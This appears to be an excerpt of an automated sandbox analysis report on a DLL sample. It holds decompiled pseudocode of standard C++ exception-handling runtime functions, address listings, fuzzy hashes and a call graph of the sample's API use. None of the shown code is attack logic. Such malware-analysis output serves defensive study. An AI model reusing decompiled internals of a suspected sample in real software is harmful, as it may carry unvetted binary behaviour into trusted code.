				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E6DAA227E(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x6dab3014;
				E6DA8C1C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x6dab3014);
				E6DA8D30C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E6DA8D490(_t77, 0xfffffffe, _t96, 0x6dab3014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E6DA8D430(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E6DA8C1C0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x6daa5010;
											if(__eflags != 0) {
												_t72 = E6DAA1D30(__eflags, 0x6daa5010);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x6daa5010; // 0x6da8a783
													 *0x6daa415c(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E6DA8D470(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E6DA8D490(_t64, _t93, _t96, 0x6dab3014);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E6DA8C1C0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E6DA8D450();
										asm("int3");
										__eflags = E6DA8D4A7();
										if(__eflags != 0) {
											_t67 = E6DA8C53A(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E6DA8D4E3();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}





























              0x6da8c200
              0x6da8c207
              0x6da8c20b
              0x6da8c20c
              0x6da8c212
              0x6da8c21e
              0x6da8c220
              0x6da8c226
              0x6da8c226
              0x6da8c22f
              0x6da8c231
              0x6da8c234
              0x6da8c237
              0x6da8c23f
              0x6da8c244
              0x6da8c247
              0x6da8c24a
              0x6da8c251
              0x6da8c2ad
              0x6da8c2b0
              0x6da8c2b8
              0x6da8c2bf
              0x00000000
              0x6da8c2bf
              0x00000000
              0x6da8c253
              0x6da8c253
              0x6da8c259
              0x6da8c25f
              0x6da8c265
              0x6da8c2d0
              0x6da8c2d9
              0x6da8c267
              0x6da8c267
              0x6da8c267
              0x6da8c26d
              0x6da8c270
              0x6da8c273
              0x6da8c276
              0x6da8c279
              0x6da8c27e
              0x6da8c294
              0x00000000
              0x6da8c280
              0x6da8c280
              0x6da8c282
              0x6da8c287
              0x6da8c289
              0x6da8c28c
              0x6da8c28e
              0x6da8c2a4
              0x6da8c2c4
              0x6da8c2c4
              0x6da8c2c8
              0x00000000
              0x6da8c290
              0x6da8c290
              0x6da8c2da
              0x6da8c2dd
              0x6da8c2e3
              0x6da8c2e5
              0x6da8c2ec
              0x6da8c2f3
              0x6da8c2f8
              0x6da8c2fb
              0x6da8c2fd
              0x6da8c2ff
              0x6da8c30c
              0x6da8c312
              0x6da8c314
              0x6da8c317
              0x6da8c317
              0x6da8c31a
              0x6da8c31a
              0x6da8c2ec
              0x6da8c320
              0x6da8c322
              0x6da8c327
              0x6da8c32a
              0x6da8c32d
              0x6da8c335
              0x6da8c339
              0x6da8c33e
              0x6da8c33e
              0x6da8c341
              0x6da8c345
              0x6da8c348
              0x6da8c355
              0x6da8c358
              0x6da8c35d
              0x6da8c363
              0x6da8c365
              0x6da8c36a
              0x6da8c36f
              0x6da8c371
              0x6da8c37c
              0x6da8c373
              0x6da8c373
              0x00000000
              0x6da8c373
              0x6da8c367
              0x6da8c367
              0x6da8c367
              0x6da8c369
              0x6da8c369
              0x6da8c292
              0x00000000
              0x6da8c292
              0x6da8c290
              0x6da8c28e
              0x00000000
              0x6da8c297
              0x6da8c297
              0x6da8c299
              0x6da8c2a0
              0x00000000
              0x6da8c2a2
              0x00000000
              0x6da8c2a0
              0x6da8c265
              0x00000000

              APIs
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6DA8C23F
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6DA8C2F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 3480331319-1018135373
              • Opcode ID: 867c7aaaa059cad63d3d36a9649f6b567ea9336ca391450b9de61086660cfb18
              • Instruction ID: 5e070fd3c8db2bb0cf7c11e0f1de4e3a3c729edf703bfb4dde4c474750511ac6
              • Opcode Fuzzy Hash: 867c7aaaa059cad63d3d36a9649f6b567ea9336ca391450b9de61086660cfb18
              • Instruction Fuzzy Hash: 5F417434908219AFCF00DFA8C880AAEBBB5BF45318F188255ED145B393D7359996CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8CB89 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 69%
              			E6DA8CB89(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E6DA8C463(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6DA8C463(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6DA8A418(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6DA8A34B(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6DA8C75F(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6DA90BF9(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}















































              0x6da8cb89
              0x6da8cb89
              0x6da8cb90
              0x6da8cb99
              0x6da8ccb8
              0x6da8cb9f
              0x6da8cba1
              0x6da8cbab
              0x6da8cbae
              0x6da8cbb4
              0x6da8cbbe
              0x6da8cbe3
              0x6da8cbe8
              0x6da8cbed
              0x6da8ccb4
              0x00000000
              0x6da8ccb5
              0x6da8cbed
              0x6da8cbbe
              0x6da8cbf3
              0x6da8cbf6
              0x6da8cbf9
              0x6da8cbff
              0x6da8cc05
              0x6da8cc17
              0x6da8cc1c
              0x6da8cc1f
              0x6da8cc22
              0x6da8cc25
              0x6da8cc28
              0x6da8cc2e
              0x6da8cc34
              0x6da8cc37
              0x6da8cc3a
              0x6da8cc49
              0x6da8cc4a
              0x6da8cc4a
              0x6da8cc4f
              0x6da8cc62
              0x6da8cc64
              0x6da8cc69
              0x6da8cc74
              0x6da8cc76
              0x6da8cc78
              0x6da8cc94
              0x6da8cc99
              0x6da8cc9c
              0x6da8cc9c
              0x6da8cc74
              0x6da8cc69
              0x6da8cca2
              0x6da8cca3
              0x6da8cca6
              0x6da8cca9
              0x6da8ccac
              0x6da8ccaf
              0x6da8cc3a
              0x00000000
              0x6da8cc2e
              0x6da8ccb9
              0x6da8ccbe
              0x6da8ccc2
              0x6da8ccc5
              0x6da8ccc6
              0x6da8ccc7
              0x6da8ccc8
              0x6da8cccd
              0x6da8cd45
              0x6da8cd47
              0x6da8cccf
              0x6da8cccf
              0x6da8ccd5
              0x00000000
              0x6da8ccd7
              0x6da8ccda
              0x6da8ccdd
              0x6da8cce4
              0x6da8cce7
              0x6da8cceb
              0x6da8cd1d
              0x6da8cd20
              0x6da8cd27
              0x6da8cd2d
              0x6da8cd37
              0x6da8cd40
              0x6da8cd40
              0x6da8cd37
              0x6da8cd2d
              0x6da8cd41
              0x6da8cced
              0x6da8cced
              0x6da8cced
              0x6da8ccf0
              0x6da8ccf0
              0x6da8ccf4
              0x00000000
              0x00000000
              0x6da8ccf8
              0x6da8cd0c
              0x6da8cd0c
              0x6da8ccfa
              0x6da8ccfa
              0x6da8cd00
              0x00000000
              0x6da8cd02
              0x6da8cd02
              0x6da8cd05
              0x6da8cd0a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8cd0a
              0x6da8cd00
              0x6da8cd15
              0x6da8cd17
              0x00000000
              0x6da8cd19
              0x6da8cd19
              0x6da8cd19
              0x00000000
              0x6da8cd17
              0x6da8cd10
              0x6da8cd12
              0x00000000
              0x6da8cd12
              0x00000000
              0x00000000
              0x00000000
              0x6da8ccdd
              0x6da8ccd5
              0x6da8cd48
              0x6da8cd4c
              0x6da8cd4c

              APIs
              • RtlEncodePointer.NTDLL(00000000), ref: 6DA8CBAE
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: fd3cd2ba3c664b29753cf7296abd684eac2416da42e7b595093f30db9aaf575e
              • Instruction ID: 70a7fcaf1686f23b957bbc165294c9ec918cab069d9ee143319d2d6021ca966d
              • Opcode Fuzzy Hash: fd3cd2ba3c664b29753cf7296abd684eac2416da42e7b595093f30db9aaf575e
              • Instruction Fuzzy Hash: AD41597590820AAFCF05CF94CD80AAE7BB5FF88304F198259FE18A7252D33599A1DF51
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:6.1%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:4.8%
              Total number of Nodes:2000
              Total number of Limit Nodes:55
              execution_graph 13046 73286e 13047 732964 13046->13047 13048 732885 13046->13048 13050 739e22 2 API calls 13047->13050 13049 73bfc8 2 API calls 13048->13049 13051 732891 13049->13051 13052 732970 13050->13052 13051->13047 13076 739f14 13051->13076 13055 732956 13056 738ddf 2 API calls 13055->13056 13056->13047 13057 739b26 2 API calls 13058 7328b5 13057->13058 13080 73bf56 13058->13080 13060 7328c8 13061 73293d 13060->13061 13062 739b26 2 API calls 13060->13062 13063 738ddf 2 API calls 13061->13063 13064 7328d4 13062->13064 13065 73294b 13063->13065 13066 73109a 2 API calls 13064->13066 13067 738ddf 2 API calls 13065->13067 13068 7328e0 13066->13068 13067->13055 13069 739c50 2 API calls 13068->13069 13070 7328f1 13069->13070 13071 738d9a 2 API calls 13070->13071 13072 7328ff 13071->13072 13072->13061 13073 73b787 2 API calls 13072->13073 13074 73291d 13073->13074 13075 738ddf 2 API calls 13074->13075 13075->13061 13077 739f1d 13076->13077 13079 7328a3 13076->13079 13083 738dc9 RtlAllocateHeap 13077->13083 13079->13055 13079->13057 13084 738dc9 RtlAllocateHeap 13080->13084 13082 73bf7b 13082->13060 13083->13079 13084->13082 14030 73fbd6 14033 738dc9 RtlAllocateHeap 14030->14033 14032 73fbe6 14033->14032 13218 73225e 13219 7398e9 2 API calls 13218->13219 13220 732295 13219->13220 13221 73bfc8 2 API calls 13220->13221 13222 7322ad 13221->13222 13223 7322b4 13222->13223 13240 73c4d1 memset 13222->13240 13225 738ddf 2 API calls 13223->13225 13233 7323fe 13225->13233 13226 732425 13228 739e22 2 API calls 13226->13228 13227 73241a 13230 738ddf 2 API calls 13227->13230 13232 732432 13228->13232 13229 738ddf 2 API calls 13229->13233 13230->13226 13231 739f85 2 API calls 13237 7322c4 13231->13237 13233->13226 13233->13227 13233->13229 13234 739c50 RtlAllocateHeap lstrcatW 13234->13237 13235 738d9a HeapFree memset 13235->13237 13236 738ddf HeapFree memset 13236->13237 13237->13223 13237->13231 13237->13234 13237->13235 13237->13236 13238 73109a 2 API calls 13237->13238 13239 73b787 memset GetExitCodeProcess 13237->13239 13238->13237 13239->13237 13255 738dc9 RtlAllocateHeap 13240->13255 13242 73c4f8 13243 739ab3 RtlAllocateHeap 13242->13243 13254 73c57c 13242->13254 13244 73c516 13243->13244 13245 739ab3 RtlAllocateHeap 13244->13245 13246 73c529 13245->13246 13247 739ab3 RtlAllocateHeap 13246->13247 13248 73c53d 13247->13248 13249 739f85 2 API calls 13248->13249 13250 73c54a 13249->13250 13251 738d9a 2 API calls 13250->13251 13252 73c570 13251->13252 13253 739ab3 RtlAllocateHeap 13252->13253 13253->13254 13254->13237 13255->13242 14038 7357c3 14057 739eab 14038->14057 14042 7357f2 14043 739f6b 2 API calls 14042->14043 14056 7358c4 14042->14056 14044 73580a 14043->14044 14045 739fa5 2 API calls 14044->14045 14046 73581f 14045->14046 14047 738d87 2 API calls 14046->14047 14048 735827 14047->14048 14049 738ddf 2 API calls 14048->14049 14050 735842 14049->14050 14051 73b787 2 API calls 14050->14051 14053 735850 14051->14053 14052 73c402 11 API calls 14052->14053 14053->14052 14054 7358b9 14053->14054 14055 738ddf 2 API calls 14054->14055 14055->14056 14058 7398e9 2 API calls 14057->14058 14059 739ecc 14058->14059 14060 739c50 2 API calls 14059->14060 14061 7357db 14060->14061 14061->14056 14062 738dc9 RtlAllocateHeap 14061->14062 14062->14042 13742 73243b 13743 73246b 13742->13743 13744 732478 13742->13744 13773 739ca5 13743->13773 13745 7398e9 2 API calls 13744->13745 13748 732482 13744->13748 13747 7324a5 13745->13747 13749 73bfc8 2 API calls 13747->13749 13750 7324bd 13749->13750 13751 7324c4 13750->13751 13752 739b26 2 API calls 13750->13752 13753 738ddf 2 API calls 13751->13753 13754 7324d3 13752->13754 13755 732628 13753->13755 13756 73c4d1 5 API calls 13754->13756 13757 738ddf 2 API calls 13755->13757 13771 7324de 13756->13771 13758 732633 13757->13758 13759 738ddf 2 API calls 13758->13759 13766 73263f 13759->13766 13760 732667 13763 739e22 2 API calls 13760->13763 13761 73265c 13765 738ddf 2 API calls 13761->13765 13762 739f85 2 API calls 13762->13771 13763->13748 13764 738ddf 2 API calls 13764->13766 13765->13760 13766->13760 13766->13761 13766->13764 13767 739c50 RtlAllocateHeap lstrcatW 13767->13771 13768 738d9a 2 API calls 13768->13771 13769 739ab3 RtlAllocateHeap 13769->13771 13770 73b787 memset GetExitCodeProcess 13770->13771 13771->13751 13771->13762 13771->13767 13771->13768 13771->13769 13771->13770 13772 738ddf HeapFree memset 13771->13772 13772->13771 13778 739cbc 13773->13778 13775 739d22 13775->13744 13776 739cf2 13776->13775 13777 739cfd lstrcatA 13776->13777 13777->13776 13779 739d11 lstrcatA 13777->13779 13780 738dc9 RtlAllocateHeap 13778->13780 13779->13776 13780->13776 12960 736438 12961 736448 ExitProcess 12960->12961 14096 7311bc 14097 7311d6 14096->14097 14110 73117d 14097->14110 14106 738ddf 2 API calls 14108 7311f2 14106->14108 14107 731219 14107->14106 14111 739f6b 2 API calls 14110->14111 14112 73118e 14111->14112 14113 739bfd 2 API calls 14112->14113 14114 7311aa 14113->14114 14115 738d87 2 API calls 14114->14115 14116 7311b7 14115->14116 14116->14108 14117 737c67 14116->14117 14168 737eb5 14117->14168 14119 737c84 14130 731210 14119->14130 14179 7376f8 14119->14179 14121 737cae 14131 737cb5 14121->14131 14196 737692 14121->14196 14122 738ddf 2 API calls 14123 737cf0 14122->14123 14125 738ddf 2 API calls 14123->14125 14126 737cfb 14125->14126 14128 738ddf 2 API calls 14126->14128 14128->14130 14130->14107 14132 73b3f2 14130->14132 14131->14122 14133 73aab0 4 API calls 14132->14133 14134 73b404 14133->14134 14135 73a1f8 GetSystemTimeAsFileTime 14134->14135 14136 73123c 14135->14136 14137 737ddc 14136->14137 14454 740522 14137->14454 14139 737dfa 14140 73bf56 RtlAllocateHeap 14139->14140 14141 737e07 14140->14141 14157 737e11 14141->14157 14457 73883b 14141->14457 14143 738ddf 2 API calls 14145 737e8d 14143->14145 14144 737e25 14149 7376f8 19 API calls 14144->14149 14144->14157 14146 738ddf 2 API calls 14145->14146 14147 737e97 14146->14147 14148 738ddf 2 API calls 14147->14148 14150 737ea1 14148->14150 14153 737e4c 14149->14153 14151 738ddf 2 API calls 14150->14151 14152 731256 14151->14152 14152->14107 14158 73110a 14152->14158 14154 737692 8 API calls 14153->14154 14153->14157 14155 737e72 14154->14155 14156 7378c5 18 API calls 14155->14156 14156->14157 14157->14143 14159 731120 14158->14159 14160 73a06e memset 14159->14160 14167 731174 14159->14167 14161 731146 14160->14161 14162 73a1f8 GetSystemTimeAsFileTime 14161->14162 14163 73115b 14162->14163 14164 73ac24 6 API calls 14163->14164 14165 731169 14164->14165 14166 73abf8 6 API calls 14165->14166 14166->14167 14167->14107 14208 7411b3 14168->14208 14170 737ebe 14212 738927 14170->14212 14172 737ed1 14173 738927 strncpy 14172->14173 14174 737ee5 14173->14174 14175 738927 strncpy 14174->14175 14176 737ef9 14175->14176 14216 741c34 14176->14216 14178 737f01 14178->14119 14308 7375e1 14179->14308 14182 73bf56 RtlAllocateHeap 14183 737732 14182->14183 14194 737767 14183->14194 14319 7374fe 14183->14319 14184 738ddf 2 API calls 14186 73777f 14184->14186 14187 738ddf 2 API calls 14186->14187 14188 73778a 14187->14188 14189 738ddf 2 API calls 14188->14189 14191 737795 14189->14191 14190 737740 14190->14194 14327 73faaf 14190->14327 14193 73779f 14191->14193 14195 738ddf 2 API calls 14191->14195 14193->14121 14194->14184 14195->14193 14197 73bfc8 2 API calls 14196->14197 14198 7376aa 14197->14198 14199 7376e6 14198->14199 14200 73755a 5 API calls 14198->14200 14205 7378c5 14199->14205 14201 7376c9 14200->14201 14202 740485 lstrlenW 14201->14202 14203 7376dd 14202->14203 14204 738ecb lstrlenW 14203->14204 14204->14199 14395 741d21 14205->14395 14207 7378de 14207->14131 14209 7411bb 14208->14209 14211 7411c2 14209->14211 14221 7428ef 14209->14221 14211->14170 14213 73893d 14212->14213 14214 738938 14212->14214 14239 741293 14213->14239 14214->14172 14217 741c43 14216->14217 14218 741c48 14217->14218 14251 741bd8 14217->14251 14218->14178 14220 741c61 14220->14178 14222 742931 14221->14222 14223 7428fe 14221->14223 14222->14211 14224 742922 SwitchToThread 14223->14224 14225 74290f 14223->14225 14224->14222 14224->14224 14227 742918 14225->14227 14228 7428c9 14225->14228 14227->14211 14233 742951 GetModuleHandleW 14228->14233 14230 7428d6 14231 7428e4 14230->14231 14238 742933 _time64 GetCurrentProcessId 14230->14238 14231->14227 14234 74296f GetProcAddress 14233->14234 14237 7429a0 14233->14237 14235 742983 GetProcAddress 14234->14235 14234->14237 14236 742992 GetProcAddress 14235->14236 14235->14237 14236->14237 14237->14230 14238->14231 14240 7412c5 14239->14240 14241 74129e 14239->14241 14240->14214 14241->14240 14243 7412d9 14241->14243 14244 741307 14243->14244 14245 7412e4 14243->14245 14244->14240 14245->14244 14247 742edb 14245->14247 14248 742ef3 14247->14248 14249 742f46 14248->14249 14250 742f7a strncpy 14248->14250 14249->14244 14250->14249 14253 741beb 14251->14253 14252 741c07 14252->14220 14253->14252 14255 7414c5 14253->14255 14256 7414f3 14255->14256 14277 741505 14255->14277 14257 7415b0 14256->14257 14258 7416c3 14256->14258 14259 74152f 14256->14259 14260 74155f 14256->14260 14265 74158f 14256->14265 14256->14277 14296 741c8e _snprintf 14257->14296 14262 741c8e 2 API calls 14258->14262 14263 741535 _snprintf 14259->14263 14279 7433da 14260->14279 14267 7416f2 14262->14267 14263->14277 14291 741a0a 14265->14291 14270 741774 14267->14270 14275 7418aa 14267->14275 14267->14277 14268 7415bf 14269 7414c5 11 API calls 14268->14269 14268->14277 14269->14268 14272 7417b5 qsort 14270->14272 14270->14277 14271 741a0a 2 API calls 14271->14275 14272->14277 14278 7417de 14272->14278 14273 7414c5 11 API calls 14273->14275 14274 741a0a 2 API calls 14274->14278 14275->14271 14275->14273 14275->14277 14276 7414c5 11 API calls 14276->14278 14277->14252 14277->14277 14278->14274 14278->14276 14278->14277 14280 7433e4 14279->14280 14281 7433e7 _snprintf 14279->14281 14280->14281 14282 743410 14281->14282 14287 743487 14281->14287 14282->14287 14301 7433b3 localeconv 14282->14301 14285 74344e strchr 14285->14287 14289 743461 14285->14289 14286 74342a strchr 14286->14285 14288 743438 14286->14288 14287->14277 14288->14285 14288->14287 14289->14287 14304 738ecb 14289->14304 14293 741a20 14291->14293 14292 741ba8 14292->14277 14293->14292 14294 741b23 _snprintf 14293->14294 14295 741b3a _snprintf 14293->14295 14294->14293 14295->14293 14298 741caf 14296->14298 14297 741cb6 14297->14268 14298->14297 14299 742edb strncpy 14298->14299 14300 741ccc 14299->14300 14300->14268 14302 7433c3 strchr 14301->14302 14303 7433d5 strchr 14301->14303 14302->14303 14303->14285 14303->14286 14305 738ef7 14304->14305 14305->14305 14306 738f17 lstrlenW 14305->14306 14307 738f2b 14306->14307 14307->14287 14307->14307 14331 738dc9 RtlAllocateHeap 14308->14331 14310 7375fb 14311 74357b 2 API calls 14310->14311 14318 73767c 14310->14318 14312 73761f 14311->14312 14332 73755a 14312->14332 14314 737634 14315 740485 lstrlenW 14314->14315 14316 737667 14315->14316 14317 738f63 memset 14316->14317 14317->14318 14318->14182 14318->14193 14320 73750f 14319->14320 14321 7398d0 2 API calls 14320->14321 14322 73752b 14321->14322 14341 738dc9 RtlAllocateHeap 14322->14341 14324 737536 14325 739fa5 2 API calls 14324->14325 14326 737550 14324->14326 14325->14326 14326->14190 14329 73fac3 14327->14329 14330 73fb09 14329->14330 14342 73fb10 14329->14342 14330->14194 14331->14310 14333 737573 14332->14333 14334 731080 2 API calls 14333->14334 14335 737580 lstrcpynA 14334->14335 14336 73759e 14335->14336 14337 738d87 2 API calls 14336->14337 14338 7375a8 14337->14338 14339 738f63 memset 14338->14339 14340 7375cd 14339->14340 14340->14314 14341->14324 14347 73f7a3 memset memset 14342->14347 14344 73fb3c 14345 73fb5f 14344->14345 14373 73f5a1 14344->14373 14345->14329 14348 739f6b 2 API calls 14347->14348 14349 73f7f5 14348->14349 14350 739f6b 2 API calls 14349->14350 14351 73f802 14350->14351 14352 739f6b 2 API calls 14351->14352 14353 73f80f 14352->14353 14354 739f6b 2 API calls 14353->14354 14355 73f81c 14354->14355 14356 739f6b 2 API calls 14355->14356 14357 73f829 14356->14357 14358 738f63 memset 14357->14358 14371 73f83d 14358->14371 14359 73f8ba GetLastError 14359->14371 14360 73fa0d 14361 738f63 memset 14360->14361 14367 73f887 14360->14367 14362 73fa2f 14361->14362 14364 73fa4b GetLastError 14362->14364 14362->14367 14363 73f8fb GetLastError 14363->14371 14364->14367 14365 73a1f8 GetSystemTimeAsFileTime 14365->14371 14366 73f953 GetLastError 14366->14371 14367->14344 14369 739f6b 2 API calls 14369->14371 14370 738d87 2 API calls 14370->14371 14371->14359 14371->14360 14371->14363 14371->14365 14371->14366 14371->14367 14371->14369 14371->14370 14372 73f9cd GetLastError 14371->14372 14389 73f6e9 14371->14389 14372->14371 14374 73f5be 14373->14374 14393 738dc9 RtlAllocateHeap 14374->14393 14376 73f5d3 14377 73f5dc 14376->14377 14394 738dc9 RtlAllocateHeap 14376->14394 14379 73f6af 14377->14379 14380 738ddf 2 API calls 14377->14380 14381 73f6c7 14379->14381 14382 738ddf 2 API calls 14379->14382 14380->14379 14381->14345 